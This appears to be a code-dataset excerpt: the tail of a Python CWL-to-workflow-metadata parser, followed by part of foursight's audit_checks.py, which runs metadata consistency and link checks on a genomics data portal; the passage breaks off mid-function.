elif isinstance(cwl_param_type,dict) and cwl_param_type['type']=='array' and cwl_param_type['items']=='File': # e.g. type={'type':'array','items':'File'}
argument_type='Input file'
return argument_type
# Add a workflow output argument and map to the step output argument.
# for now we assume that 1. a global output argument has a single source and 2. that it is an output of some step. (I think this is a reasonable assumption)
def map_workflow_output_argument_to_step_argument ( workflow, source, workflow_argument, step, step_argument ):
workflow['arguments'].append(
{'workflow_argument_name': workflow_argument,
'argument_type':'Output file',
'argument_mapping':[{ 'workflow_step': step,
'step_argument_name': step_argument,
'step_argument_type':'Output file'
}]
})
# Add a step argument and map to the global input source.
# Assumes the global source exists in workflow['arguments']
def map_step_argument_to_workflow_input_argument ( workflow, source, step_id, step_argument ):
if 'arguments' in workflow:
argument_index= -1
for i in range(0,len(workflow['arguments'])):
e = workflow['arguments'][i]
if e['workflow_argument_name'] == source['arg']:
argument_index = i
global_argument_type = e['argument_type']
if argument_index == -1:
sys.exit("Error: corresponding workflow argument doesn't exist: {}".format(source['arg']))
else:
sys.exit("Error: workflow argument doesn't exist.")
# fill in the workflow dictionary. The step argument type is assumed to be the same as global argument type (in this case global argument type exists and since it is the source, it is either Input file or parameter.)
workflow['arguments'][argument_index]['argument_mapping']= \
[{ 'workflow_step': step_id, # id of the step.
'step_argument_name': step_argument, # id of an input entry of the step, remove '#step' from #step.ID
'step_argument_type': global_argument_type
}]
# add a step argument and map it to another step argument
# if source step argument doesn't exist in the workflow dictionary yet, create a new entry.
# the function assumes that the source is not a global argument.
def map_step_argument_to_another_step_argument ( workflow, source, step_id, step_argument ):
if 'arguments' in workflow:
for i in range(0,len(workflow['arguments'])):
e= workflow['arguments'][i]
argument_index=-1
if 'workflow_argument_mapping' in e:
for e2 in e['workflow_argument_mapping']:
if e['workflow_step'] == source.step and e['step_argument_name'] == source.arg: # sourced from a previously entered entry.
argument_index=i
workflow['arguments'][argument_index]['argument_mapping']= \
[{ 'workflow_step': step_id, # id of the step.
'step_argument_name': step_argument, # id of an input entry of the step, remove '#step' from #step.ID
'step_argument_type': 'Input file or parameter'
},
{ 'workflow_step': source['step'], # id of the source step.
'step_argument_name': source['arg'],
'step_argument_type': 'Output file or parameter' # do we pass parameters between steps as well?
}]
break # in theory there should be only a single match, so break shoudn't be necessary except for saving time.
if argument_index == -1: ## corresponding source step argument doesn't exist. It may appear later in cwl.
# sys.exit("Error: corresponding source step argument doesn't exist.") # don't produce error message. create a new entry.
workflow['arguments'].append(
{'workflow_argument_name': '',
'argument_type':'',
'argument_mapping':[{ 'workflow_step': step_id,
'step_argument_name': step_argument,
'step_argument_type':'Input file or parameter' # either Input file or parameter. # Is there a way to know this from workflow cwl? I will not decide it for now : any argument that is not globally associated doesn't matter too much in terms of schema.
},
{ 'workflow_step': source['step'],
'step_argument_name': source['arg'],
'step_argument_type':'Output file or parameter' # do we pass parameters between steps as well?
}]
})
else:
sys.exit("Error: workflow argument doesn't exist.")
# function that takes a cwl file and write a workflow insert json file
def parse_cwl(cwlfile, workflow_metadata_json, workflow_name, workflow_description, workflow_type, cwl_url, uuid):
# get cwl as a dict
with open(cwlfile,'r') as f:
cwl_dict=json.load(f)
# handle SBG cwl.
if 'raw' in cwl_dict:
cwl_dict=cwl_dict['raw'] # 'some' SBG's cwl is one level down under the 'raw' field.
# initialize dictionary to write to output json file
workflow={ 'arguments':[], # this is what we will create.
"workflow_steps": [], # this, too.
"title": workflow_name,
"description": workflow_description,
"workflow_type": workflow_type,
"cwl_pointer": cwl_url,
"workflow_diagram": '',
"uuid": uuid }
# parsing global input files and parameters and storing to the workflow dictionary (can't map to step arguments yet)
# argument type is either 'Input file' or 'parameter'.
for x in cwl_dict['inputs']:
argument_type = Is_Input_file_or_parameter (x['type'])
workflow['arguments'].append({'workflow_argument_name':x['id'].strip('#'), 'argument_type':argument_type})
## parsing global output files and storing to the workflow dictionary and mapping to step arguments
## (the mapping (source) information is in the same field in cwl since the global output is usually sourced from a step output )
for x in cwl_dict['outputs']:
source = parse_source(x['source'][0])
map_workflow_output_argument_to_step_argument ( workflow, source, x['id'].strip('#'), source['step'], source['arg'] )
## parsing steps (map 1. global output files to step arguments and 2. between arguments between steps that are not globally defined)
## fill in 'arguments'
for x in cwl_dict['steps']:
for y in x['inputs']:
if 'source' in y:
source = parse_source(y['source'][0])
## case 1: global argument is the source
if source['step']=='':
map_step_argument_to_workflow_input_argument( workflow, source, x['id'].strip('#'), parse_source(y['id'])['arg'] )
## case 2: no global argument (just passing between steps)
else:
map_step_argument_to_another_step_argument( workflow, source, x['id'].strip('#'), parse_source(y['id'])['arg'] )
## case 3 (no global argument, no passing between steps) - we assume this doesn't exist.
## parsing steps again
## fill in workflow_steps.
for x in cwl_dict['steps']:
workflow['workflow_steps'].append( { 'step_name': x['id'].strip('#'), 'step': generate_uuid() } ) ## assuming that uuid for step is generated at this point? Or should we retrieve a corresponding step that already exists?
with open(workflow_metadata_json,'w') as fo:
fo.write ( json.dumps(workflow,indent=4) + "\n")
#fo.write ( cwl_dict.keys() + "\n")
#fo.write ( json.dumps(cwl_dict['outputs'],indent=4) + "\n")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="temporary cwl parser that creates a workflow insert")
parser.add_argument('-c','--cwlfile', help='input cwlfile')
parser.add_argument('-w','--workflow_metadata_json', help='output workflow metadata json file')
parser.add_argument('-n','--workflow_name', help='output workflow metadata json file')
parser.add_argument('-d','--workflow_description', help='output workflow metadata json file')
parser.add_argument('-t','--workflow_type', help='output workflow metadata json file')
parser.add_argument('-u','--cwl_url', help='output workflow metadata json file')
args = parser.parse_args()
uuid= generate_uuid()
parse_cwl(args.cwlfile, args.workflow_metadata_json, args.workflow_name, args.workflow_description, args.workflow_type, args.cwl_url, uuid )
``` |
{
"source": "4dn-dcic/foursight",
"score": 2
} |
#### File: chalicelib/checks/audit_checks.py
```python
from dcicutils import ff_utils
import re
import requests
import datetime
from .helpers import wrangler_utils
# Use confchecks to import decorators object and its methods for each check module
# rather than importing check_function, action_function, CheckResult, ActionResult
# individually - they're now part of class Decorators in foursight-core::decorators
# that requires initialization with foursight prefix.
from .helpers.confchecks import *
STATUS_LEVEL = {
'released': 4,
'archived': 4,
'current': 4,
'revoked': 4,
'released to project': 3,
'pre-release': 2,
'restricted': 4,
'planned': 2,
'archived to project': 3,
'in review by lab': 1,
'released to lab': 1,
'submission in progress': 1,
'to be uploaded by workflow': 1,
'uploading': 1,
'uploaded': 1,
'upload failed': 1,
'draft': 1,
'deleted': 0,
'replaced': 0,
'obsolete': 0,
}
@check_function()
def biosource_cell_line_value(connection, **kwargs):
'''
checks cell line biosources to make sure they have an associated ontology term
'''
check = CheckResult(connection, 'biosource_cell_line_value')
cell_line_types = ["primary cell", "primary cell line", "immortalized cell line",
"induced pluripotent stem cell", "stem cell", "stem cell derived cell line"]
biosources = ff_utils.search_metadata(
'search/?type=Biosource&cell_line.display_title=No+value&frame=object' +
''.join(['&biosource_type=' + c for c in cell_line_types]),
key=connection.ff_keys)
missing = []
for biosource in biosources:
missing.append({'uuid': biosource['uuid'],
'@id': biosource['@id'],
'biosource_type': biosource.get('biosource_type'),
'description': biosource.get('description'),
'error': 'Missing cell_line OntologyTerm'})
check.full_output = missing
check.brief_output = [item['@id'] for item in missing]
if missing:
check.status = 'WARN'
check.summary = 'Cell line biosources found missing cell_line metadata'
else:
check.status = 'PASS'
check.summary = 'No cell line biosources are missing cell_line metadata'
return check
@check_function()
def external_expsets_without_pub(connection, **kwargs):
'''
checks external experiment sets to see if they are attributed to a publication
'''
check = CheckResult(connection, 'external_expsets_without_pub')
ext = ff_utils.search_metadata('search/?award.project=External&type=ExperimentSet&frame=object',
key=connection.ff_keys, page_limit=50)
no_pub = []
for expset in ext:
if not expset.get('publications_of_set') and not expset.get('produced_in_pub'):
no_pub.append({'uuid': expset['uuid'],
'@id': expset['@id'],
'description': expset.get('description'),
'lab': expset.get('lab'),
'error': 'Missing attribution to a publication'})
if no_pub:
check.status = 'WARN'
check.summary = 'External experiment sets found without associated publication. Searched %s' % len(ext)
check.description = '{} external experiment sets are missing attribution to a publication.'.format(len(no_pub))
else:
check.status = 'PASS'
check.summary = 'No external experiment sets are missing publication. Searched %s' % len(ext)
check.description = '0 external experiment sets are missing attribution to a publication.'
check.full_output = no_pub
check.brief_output = [item['uuid'] for item in no_pub]
return check
@check_function()
def expset_opfsets_unique_titles(connection, **kwargs):
'''
checks experiment sets with other_processed_files to see if each collection
of other_processed_files has a unique title within that experiment set
'''
check = CheckResult(connection, 'expset_opfsets_unique_titles')
opf_expsets = ff_utils.search_metadata('search/?type=ExperimentSet&other_processed_files.files.uuid%21=No+value&frame=object',
key=connection.ff_keys, page_limit=50)
errors = []
for expset in opf_expsets:
e = []
fileset_names = [fileset.get('title') for fileset in expset['other_processed_files']]
if None in fileset_names or '' in fileset_names:
e.append('Missing title')
if len(list(set(fileset_names))) != len(fileset_names):
e.append('Duplicate title')
if e:
info = {'uuid': expset['uuid'],
'@id': expset['@id'],
'errors': []}
if 'Missing title' in e:
info['errors'] += ['ExperimentSet {} has an other_processed_files collection with a missing title.'.format(expset['accession'])]
if 'Duplicate title' in e:
info['errors'] += ['ExperimentSet {} has 2+ other_processed_files collections with duplicated titles.'.format(expset['accession'])]
errors.append(info)
if errors:
check.status = 'WARN'
check.summary = 'Experiment Sets found with duplicate/missing titles in other_processed_files'
check.description = '{} Experiment Sets have other_processed_files collections with missing or duplicate titles.'.format(len(errors))
else:
check.status = 'PASS'
check.summary = 'No issues found with other_processed_files of experiment sets'
check.description = '0 Experiment Sets have other_processed_files collections with missing or duplicate titles.'
check.full_output = errors
check.brief_output = {'missing title': [item['uuid'] for item in errors if 'missing' in ''.join(item['errors'])],
'duplicate title': [item['uuid'] for item in errors if 'duplicated' in ''.join(item['errors'])]}
return check
@check_function()
def expset_opf_unique_files_in_experiments(connection, **kwargs):
'''
checks experiment sets with other_processed_files and looks for other_processed_files collections
in child experiments to make sure that (1) the collections have titles and (2) that if the titles
are shared with the parent experiment set, that the filenames contained within are unique
'''
check = CheckResult(connection, 'expset_opf_unique_files_in_experiments')
opf_expsets = ff_utils.search_metadata('search/?type=ExperimentSet&other_processed_files.files.uuid%21=No+value',
key=connection.ff_keys, page_limit=25)
errors = []
for expset in opf_expsets:
expset_titles = {fileset.get('title'): fileset.get('files') for fileset in expset['other_processed_files'] if fileset.get('title')}
if not expset.get('experiments_in_set'):
continue
for expt in (exp for exp in expset.get('experiments_in_set') if exp.get('other_processed_files')):
e = []
for opf_set in expt['other_processed_files']:
# look for missing names
if not opf_set.get('title'):
e.append('Experiment {} in Experiment Set {} has an other_processed_files set '
'missing a title.'.format(expt['accession'], expset['accession']))
# look for duplicate names
elif opf_set.get('title') in expset_titles.keys() and opf_set.get('files'):
for opf_file in opf_set['files']:
# if duplicate names, look for duplicate file names
if opf_file in expset_titles[opf_set['title']]:
e.append('Experiment {} other_processed_files collection with title `{}` has file {} which '
'is also present in parent ExperimentSet {} other_processed_files collection of the '
'same name.'.format(expt['accession'], opf_set['title'], opf_file['accession'], expset['accession']))
if e:
errors.append({'uuid': expt['uuid'],
'@id': expt['@id'],
'error_details': e})
if errors:
check.status = 'WARN'
check.summary = '{} experiments found with issues in other_processed_files'.format(len(errors))
check.description = ('{} Experiments found that are either missing titles for sets of other_processed_files,'
' or have non-uniquefilenames in other_processed_files'.format(len(errors)))
else:
check.status = 'PASS'
check.summary = 'No issues found with other_processed_files of experiments'
check.description = ('0 Experiments found to be missing titles for sets of other_processed_files,'
' or have non-unique filenames in other_processed_files')
check.full_output = errors
check.brief_output = {'missing title': [item['uuid'] for item in errors if 'missing' in ''.join(item['error_details'])],
'duplicate title': [item['uuid'] for item in errors if 'also present in parent' in ''.join(item['error_details'])]}
return check
@check_function(days_back=14)
def expset_opf_unique_files(connection, **kwargs):
'''
Checks Experiments and Experiment Sets with other_processed_files and looks
if any opf is also present within the raw, processed or reference files.
'''
check = CheckResult(connection, 'expset_opf_unique_files')
days_back = kwargs.get('days_back')
from_date_query, from_text = wrangler_utils.last_modified_from(days_back)
# opfs can be on Exps or ExpSets: search ExpSets for each case and merge results
opf_query = ('other_processed_files.files.uuid%21=No+value' +
from_date_query +
'&field=experiments_in_set&field=processed_files&field=other_processed_files')
opf_sets = ff_utils.search_metadata(
'search/?type=ExperimentSet&' + opf_query, key=connection.ff_keys)
opf_exps = ff_utils.search_metadata(
'search/?type=ExperimentSet&experiments_in_set.' + opf_query, key=connection.ff_keys)
# merge
es_list = [expset['@id'] for expset in opf_sets]
for expset in opf_exps:
if expset['@id'] not in es_list:
opf_sets.append(expset)
errors = {}
for expset in opf_sets:
# skip sets without experiments
if not expset.get('experiments_in_set'):
continue
opfs_id = [] # list opfs @id in the ExpSet and Exps
all_files = [] # list all raw, processed and reference files in the ExpSet
if expset.get('other_processed_files'):
opfs_id.extend([f['@id'] for grp in expset['other_processed_files'] for f in grp.get('files', [])])
for exp in expset['experiments_in_set']:
if exp.get('other_processed_files'):
opfs_id.extend([f['@id'] for grp in exp['other_processed_files'] for f in grp.get('files', [])])
all_files.extend([f['@id'] for f in exp.get('files', [])])
all_files.extend([f['@id'] for f in exp.get('processed_files', [])])
all_files.extend([f['@id'] for f in exp.get('reference_files', [])])
all_files.extend([f['@id'] for f in expset.get('processed_files', [])])
# compare opfs and files lists to find duplicates
for opf in opfs_id:
if opf in all_files:
errors.setdefault(expset['@id'], []).append(opf)
if errors:
check.status = 'WARN'
check.summary = '{} exp sets found with files that are also other_processed_files'.format(len(errors))
check.description = ('{} Experiment Sets {}found that have other_processed_files'
' which are also present in raw, processed or reference files'.format(len(errors), from_text))
else:
check.status = 'PASS'
check.summary = 'No exp sets found with files that are also other_processed_files'
check.description = ('No Experiment Sets {}found that have other_processed_files'
' which are also present in raw, processed or reference files'.format(from_text))
check.full_output = errors
return check
@check_function()
def paired_end_info_consistent(connection, **kwargs):
'''
Check that fastqs with a paired_end number have a paired_with related_file, and vice versa
'''
check = CheckResult(connection, 'paired_end_info_consistent')
search1 = 'search/?type=FileFastq&file_format.file_format=fastq&related_files.relationship_type=paired+with&paired_end=No+value'
search2 = 'search/?type=FileFastq&file_format.file_format=fastq&related_files.relationship_type!=paired+with&paired_end%21=No+value'
results1 = ff_utils.search_metadata(search1 + '&frame=object', key=connection.ff_keys)
results2 = ff_utils.search_metadata(search2 + '&frame=object', key=connection.ff_keys)
results = {'paired with file missing paired_end number':
[result1['@id'] for result1 in results1],
'file with paired_end number missing "paired with" related_file':
[result2['@id'] for result2 in results2]}
if [val for val in results.values() if val]:
check.status = 'WARN'
check.summary = 'Inconsistencies found in FileFastq paired end info'
check.description = ('{} files found with a "paired with" related_file but missing a paired_end number; '
'{} files found with a paired_end number but missing related_file info'
''.format(len(results['paired with file missing paired_end number']),
len(results['file with paired_end number missing "paired with" related_file'])))
else:
check.status = 'PASS'
check.summary = 'No inconsistencies in FileFastq paired end info'
check.description = 'All paired end fastq files have both paired end number and "paired with" related_file'
check.full_output = results
check.brief_output = [item for val in results.values() for item in val]
return check
@check_function()
def workflow_properties(connection, **kwargs):
check = CheckResult(connection, 'workflow_properties')
workflows = ff_utils.search_metadata('search/?type=Workflow&category!=provenance&frame=object',
key=connection.ff_keys)
bad = {'Duplicate Input Names in Workflow Step': [],
'Duplicate Output Names in Workflow Step': [],
'Duplicate Input Source Names in Workflow Step': [],
'Duplicate Output Target Names in Workflow Step': [],
'Missing meta.file_format property in Workflow Step Input': [],
'Missing meta.file_format property in Workflow Step Output': []}
by_wf = {}
for wf in workflows:
# print(wf['@id'])
issues = []
for step in wf.get('steps'):
# no duplicates in input names
step_inputs = step.get('inputs')
for step_input in step_inputs:
if (step_input['meta'].get('type') in ['data file', 'reference file'] and not
step_input['meta'].get('file_format')):
issues.append('Missing meta.file_format property in Workflow Step `{}` Input `{}`'
''.format(step.get('name'), step_input.get('name')))
input_names = [step_input.get('name') for step_input in step_inputs]
if len(list(set(input_names))) != len(input_names):
issues.append('Duplicate Input Names in Workflow Step {}'.format(step.get('name')))
# no duplicates in input source names
sources = [(source.get('name'), source.get('step', "GLOBAL")) for
step_input in step_inputs for source in step_input.get('source')]
if len(sources) != len(list(set(sources))):
issues.append('Duplicate Input Source Names in Workflow Step {}'.format(step.get('name')))
# no duplicates in output names
step_outputs = step.get('outputs')
for step_output in step_outputs:
if (step_output['meta'].get('type') in ['data file', 'reference file'] and not
step_output['meta'].get('file_format')):
issues.append('Missing meta.file_format property in Workflow Step `{}` Output `{}`'
''.format(step.get('name'), step_output.get('name')))
output_names = [step_output.get('name') for step_output in step_outputs]
if len(list(set(output_names))) != len(output_names):
issues.append('Duplicate Output Names in Workflow Step {}'.format(step.get('name')))
# no duplicates in output target names
targets = [(target.get('name'), target.get('step', 'GLOBAL')) for step_output in
step_outputs for target in step_output.get('target')]
if len(targets) != len(list(set(targets))):
issues.append('Duplicate Output Target Names in Workflow Step {}'.format(step.get('name')))
if not issues:
continue
errors = ' '.join(issues)
if 'Duplicate Input Names' in errors:
bad['Duplicate Input Names in Workflow Step'].append(wf['@id'])
if 'Duplicate Output Names' in errors:
bad['Duplicate Output Names in Workflow Step'].append(wf['@id'])
if 'Duplicate Input Source Names' in errors:
bad['Duplicate Input Source Names in Workflow Step'].append(wf['@id'])
if 'Duplicate Output Target Names' in errors:
bad['Duplicate Output Target Names in Workflow Step'].append(wf['@id'])
if '` Input `' in errors:
bad['Missing meta.file_format property in Workflow Step Input'].append(wf['@id'])
if '` Output `' in errors:
bad['Missing meta.file_format property in Workflow Step Output'].append(wf['@id'])
by_wf[wf['@id']] = issues
if by_wf:
check.status = 'WARN'
check.summary = 'Workflows found with issues in `steps`'
check.description = ('{} workflows found with duplicate item names or missing fields'
' in `steps`'.format(len(by_wf.keys())))
else:
check.status = 'PASS'
check.summary = 'No workflows with issues in `steps` field'
check.description = ('No workflows found with duplicate item names or missing fields'
' in steps property')
check.brief_output = bad
check.full_output = by_wf
return check
@check_function()
def page_children_routes(connection, **kwargs):
check = CheckResult(connection, 'page_children_routes')
page_search = 'search/?type=Page&format=json&children.name%21=No+value'
results = ff_utils.search_metadata(page_search, key=connection.ff_keys)
problem_routes = {}
for result in results:
if result['name'] != 'resources/data-collections':
bad_children = [child['name'] for child in result['children'] if
child['name'] != result['name'] + '/' + child['name'].split('/')[-1]]
if bad_children:
problem_routes[result['name']] = bad_children
if problem_routes:
check.status = 'WARN'
check.summary = 'Pages with bad routes found'
check.description = ('{} child pages whose route is not a direct sub-route of parent'
''.format(sum([len(val) for val in problem_routes.values()])))
else:
check.status = 'PASS'
check.summary = 'No pages with bad routes'
check.description = 'All routes of child pages are a direct sub-route of parent page'
check.full_output = problem_routes
return check
@check_function()
def check_help_page_urls(connection, **kwargs):
check = CheckResult(connection, 'check_help_page_urls')
server = connection.ff_keys['server']
help_results = ff_utils.search_metadata(
'search/?type=StaticSection&q=help&status=released&field=body&field=options',
key=connection.ff_keys
)
resource_results = ff_utils.search_metadata(
'search/?type=StaticSection&q=resources&status=released&field=body&field=options',
key=connection.ff_keys
)
results = help_results
results = results + [item for item in resource_results if item['@id'] not in [res['@id'] for res in results]]
sections_w_broken_links = {}
addl_exceptions = {}
timeouts = {}
for result in results:
broken_links = []
body = result.get('body', '')
urls = []
if result.get('options', {}).get('filetype') == 'md':
# look for markdown links - e.g. [text](link)
links = re.findall(r'\[[^\]]+\]\([^\)]+\)', body)
for link in links:
# test only link part of match (not text part, even if it looks like a link)
idx = link.index(']')
url = link[link.index('(', idx)+1:-1]
urls.append(url)
# remove these from body so body can be checked for other types of links
body = body[:body.index(link)] + body[body.index(link)+len(link):]
# looks for links starting with http (full) or / (relative) inside parentheses or brackets
urls += re.findall(r'[\(\[=]["]*(http[^\s\)\]"]+|/[^\s\)\]"]+)[\)\]"]', body)
for url in urls:
if url.startswith('mailto'):
continue
elif 'biorxiv.org' in url.lower():
# biorxiv does not allow programmatic requests - skip
continue
if url.startswith('#'): # section of static page
url = result['@id'] + url
if url.startswith('/'): # fill in appropriate url for relative link
url = server + url
if url.startswith(server.rstrip('/') + '/search/') or url.startswith(server.rstrip('/') + '/browse/'):
continue
try:
request = requests.get(url.replace('&', '&'), timeout=2)
if request.status_code == 403 and 'doi.org' in url:
# requests to doi.org that get redirected to biorxiv fail with 403
addl_exceptions.setdefault(result['@id'], {})
addl_exceptions[result['@id']][url] = str(403)
elif request.status_code not in [200, 412]:
broken_links.append((url, request.status_code))
except requests.exceptions.Timeout:
timeouts.setdefault(result['@id'], [])
timeouts[result['@id']].append(url)
except requests.exceptions.SSLError:
continue
except Exception as e:
addl_exceptions.setdefault(result['@id'], {})
addl_exceptions[result['@id']][url] = str(e)
if broken_links:
sections_w_broken_links[result['@id']] = broken_links
if sections_w_broken_links:
check.status = 'WARN'
check.summary = 'Broken links found'
check.description = ('{} static sections currently have broken links.'
''.format(len(sections_w_broken_links.keys())))
else:
check.status = 'PASS'
check.summary = 'No broken links found'
check.description = check.summary
check.full_output = {
'broken links': sections_w_broken_links,
'timed out requests': timeouts,
'additional exceptions': addl_exceptions
}
return check
@check_function(run_on_uuid_list=None, add_res_to_ignore=False, reset_ignore=False)
def check_search_urls(connection, **kwargs):
'''Check for URLs in static sections that link to a search or browse page
and return no results. Keeps a list of items to ignore.
Args:
- run_on_uuid_list: if present, run the check only on these items (list of
uuids, comma separated).
- add_res_to_ignore: if True, add all results to the ignore list and they
will not show up next time (default is False). Use in combination with run_on_uuid_list.
- reset_ignore: if True, empty the ignore list (default is False).
Results:
- full_output.result: static sections have URLs to search/browse with 0 results.
- full_output.ignore: static sections in the ignore list are not checked by
current and future runs of the check. Can be modified by check kwargs.
'''
check = CheckResult(connection, 'check_search_urls')
# get items to ignore from previous check result, unless reset_ignore is True
if kwargs.get('reset_ignore') is True:
ignored_sections = []
else:
last_result = check.get_primary_result()
# if last one was fail, find an earlier check with non-FAIL status
it = 0
while last_result['status'] == 'ERROR' or not last_result['kwargs'].get('primary'):
it += 1
hours = it * 7 * 24 # this is a weekly check, so look for checks with 7 days iteration
last_result = check.get_closest_result(diff_hours=hours)
if it > 4:
check.summary = 'Cannot find a non-fail primary check in the past 4 weeks'
check.status = 'ERROR'
return check
# remove cases previously ignored
ignored_sections = last_result['full_output'].get('ignore', [])
query = 'search/?type=StaticSection&status%21=deleted&status%21=draft'
# if check is limited to certain uuids
if kwargs.get('run_on_uuid_list'):
uuids = kwargs['run_on_uuid_list'].split(',')
query += ''.join(['&uuid=' + u.strip() for u in uuids])
results = ff_utils.search_metadata(query + '&field=body&field=uuid',
key=connection.ff_keys)
problematic_sections = {}
results_filtered = [r for r in results if r['uuid'] not in ignored_sections]
for result in results_filtered:
body = result.get('body', '')
# search links for search or browse pages, either explicit or relative
urls = re.findall(r'[\(\[=]["]*(?:[^\s\)\]"]+(?:4dnucleome|elasticbeanstalk)[^\s\)\]"]+|/)((?:browse|search)/\?[^\s\)\]"]+)[\)\]"]', body)
if urls:
for url in urls:
url = url.replace('&', '&') # replace HTML &
url = re.sub(r'&limit=[^&]*|limit=[^&]*&?', '', url) # remove limit if present
q_results = ff_utils.search_metadata(url + '&limit=1&field=uuid', key=connection.ff_keys)
if len(q_results) == 0:
problematic_sections.setdefault(result['uuid'], [])
problematic_sections[result['uuid']].append(url)
# move results to ignored if add_res_to_ignore == True
if problematic_sections and kwargs.get('add_res_to_ignore') is True:
ignored_sections.extend([uuid for uuid in problematic_sections.keys() if uuid not in ignored_sections])
problematic_sections = {}
if problematic_sections:
check.status = 'WARN'
check.summary = 'Empty search links found'
check.description = ('{} static sections currently have empty search links.'
''.format(len(problematic_sections.keys())))
else:
check.status = 'PASS'
check.summary = 'No empty search links found'
check.description = check.summary
check.full_output = {'result': problematic_sections, 'ignore': ignored_sections}
return check
@check_function(id_list=None)
def check_status_mismatch(connection, **kwargs):
check = CheckResult(connection, 'check_status_mismatch')
id_list = kwargs['id_list']
MIN_CHUNK_SIZE = 200
# embedded sub items should have an equal or greater level
# than that of the item in which they are embedded
id2links = {}
id2status = {}
id2item = {}
stati2search = ['released', 'released_to_project']
items2search = ['ExperimentSet']
item_search = 'search/?frame=object'
for item in items2search:
item_search += '&type={}'.format(item)
for status in stati2search:
item_search += '&status={}'.format(status)
if id_list:
itemids = re.split(',|\s+', id_list)
itemids = [id for id in itemids if id]
else:
itemres = ff_utils.search_metadata(item_search, key=connection.ff_keys, page_limit=500)
itemids = [item.get('uuid') for item in itemres]
es_items = ff_utils.get_es_metadata(itemids, key=connection.ff_keys, chunk_size=200, is_generator=True)
for es_item in es_items:
label = es_item.get('embedded').get('display_title')
desc = es_item.get('object').get('description')
lab = es_item.get('embedded').get('lab').get('display_title')
status = es_item.get('properties').get('status', 'in review by lab')
opfs = _get_all_other_processed_files(es_item)
id2links[es_item.get('uuid')] = [li.get('uuid') for li in es_item.get('linked_uuids_embedded')]
id2status[es_item.get('uuid')] = STATUS_LEVEL.get(status)
id2item[es_item.get('uuid')] = {'label': label, 'status': status, 'lab': lab,
'description': desc, 'to_ignore': list(set(opfs))}
mismatches = {}
linked2get = {}
for i, iid in enumerate(itemids):
linkedids = id2links.get(iid)
if not linkedids: # item with no link
continue
istatus = id2status.get(iid)
for lid in linkedids:
lstatus = id2status.get(lid)
if not lstatus: # add to list to get
linked2get.setdefault(lid, []).append(iid)
elif lstatus < istatus: # status mismatch for an item we've seen before
ignore = id2item.get(iid).get('to_ignore')
if ignore is not None and lid in ignore:
continue
else:
mismatches.setdefault(iid, []).append(lid)
if len(linked2get) > MIN_CHUNK_SIZE or i + 1 == len(itemids): # only query es when we have more than a set number of ids (500)
linked2chk = ff_utils.get_es_metadata(list(linked2get.keys()), key=connection.ff_keys,
chunk_size=200, is_generator=True)
for litem in linked2chk:
luuid = litem.get('uuid')
listatus = litem.get('properties').get('status', 'in review by lab')
llabel = litem.get('item_type')
lstatus = STATUS_LEVEL.get(listatus)
# add info to tracking dict
id2status[luuid] = lstatus
id2item[luuid] = {'label': llabel, 'status': listatus}
for lfid in set(linked2get[luuid]):
# check to see if the linked item is something to ignore for that item
ignore = id2item[lfid].get('to_ignore')
if ignore is not None and luuid in ignore:
continue
elif lstatus < id2status[lfid]: # status mismatch so add to report
mismatches.setdefault(lfid, []).append(luuid)
linked2get = {} # reset the linked id dict
if mismatches:
brief_output = {}
full_output = {}
for eid, mids in mismatches.items():
eset = id2item.get(eid)
key = '{} | {} | {} | {}'.format(
eid, eset.get('label'), eset.get('status'), eset.get('description'))
brief_output.setdefault(eset.get('lab'), {}).update({key: len(mids)})
for mid in mids:
mitem = id2item.get(mid)
val = '{} | {} | {}'.format(mid, mitem.get('label'), mitem.get('status'))
full_output.setdefault(eset.get('lab'), {}).setdefault(key, []).append(val)
check.status = 'WARN'
check.summary = "MISMATCHED STATUSES FOUND"
check.description = 'Released or pre-release items have linked items with unreleased status'
check.brief_output = brief_output
check.full_output = full_output
else:
check.status = 'PASS'
check.summary = "NO MISMATCHES FOUND"
check.description = 'all statuses present and correct'
return check
@check_function(id_list=None)
def check_opf_status_mismatch(connection, **kwargs):
'''
Check to make sure that collections of other_processed_files don't have
status mismatches. Specifically, checks that (1) all files in an
other_processed_files collection have the same status; and (2) the status of
the experiment set is on the same status level or higher than the status of
files in the other_processed_files collection (e.g., if the other_processed_files
were released when the experiment set is in review by lab.)
'''
check = CheckResult(connection, 'check_opf_status_mismatch')
opf_set = ('search/?type=ExperimentSet&other_processed_files.title%21=No+value&field=status'
'&field=other_processed_files&field=experiments_in_set.other_processed_files')
opf_exp = ('search/?type=ExperimentSet&other_processed_files.title=No+value'
'&experiments_in_set.other_processed_files.title%21=No+value'
'&field=experiments_in_set.other_processed_files&field=status')
opf_set_results = ff_utils.search_metadata(opf_set, key=connection.ff_keys)
opf_exp_results = ff_utils.search_metadata(opf_exp, key=connection.ff_keys)
results = opf_set_results + opf_exp_results
# extract file uuids
files = []
for result in results:
if result.get('other_processed_files'):
for case in result['other_processed_files']:
files.extend([i['uuid'] for i in case['files']])
if case.get('higlass_view_config'):
files.append(case['higlass_view_config'].get('uuid'))
if result.get('experiments_in_set'):
for exp in result['experiments_in_set']:
for case in exp['other_processed_files']:
files.extend([i['uuid'] for i in case['files']])
# get metadata for files, to collect status
resp = ff_utils.get_es_metadata(list(set(files)),
sources=['links.quality_metric', 'object.status', 'uuid'],
key=connection.ff_keys)
opf_status_dict = {item['uuid']: item['object']['status'] for item in resp if item['uuid'] in files}
opf_linked_dict = {
item['uuid']: item.get('links', {}).get('quality_metric', []) for item in resp if item['uuid'] in files
}
quality_metrics = [uuid for item in resp for uuid in item.get('links', {}).get('quality_metric', [])]
qm_resp = ff_utils.get_es_metadata(list(set(quality_metrics)),
sources=['uuid', 'object.status'],
key=connection.ff_keys)
opf_other_dict = {item['uuid']: item['object']['status'] for item in qm_resp if item not in files}
check.full_output = {}
for result in results:
hg_dict = {item['title']: item.get('higlass_view_config', {}).get('uuid')
for item in result.get('other_processed_files', [])}
titles = [item['title'] for item in result.get('other_processed_files', [])]
titles.extend([item['title'] for exp in result.get('experiments_in_set', [])
for item in exp.get('other_processed_files', [])])
titles = list(set(titles))
problem_dict = {}
for title in titles:
file_list = [item for fileset in result.get('other_processed_files', [])
for item in fileset['files'] if fileset['title'] == title]
file_list.extend([item for exp in result.get('experiments_in_set', [])
for fileset in exp['other_processed_files']
for item in fileset['files'] if fileset['title'] == title])
statuses = set([opf_status_dict[f['uuid']] for f in file_list])
# import pdb; pdb.set_trace()
if not statuses:
# to account for empty sections that may not yet contain files
pass
elif len(statuses) > 1: # status mismatch in opf collection
scores = set([STATUS_LEVEL.get(status, 0) for status in list(statuses)])
if len(scores) > 1:
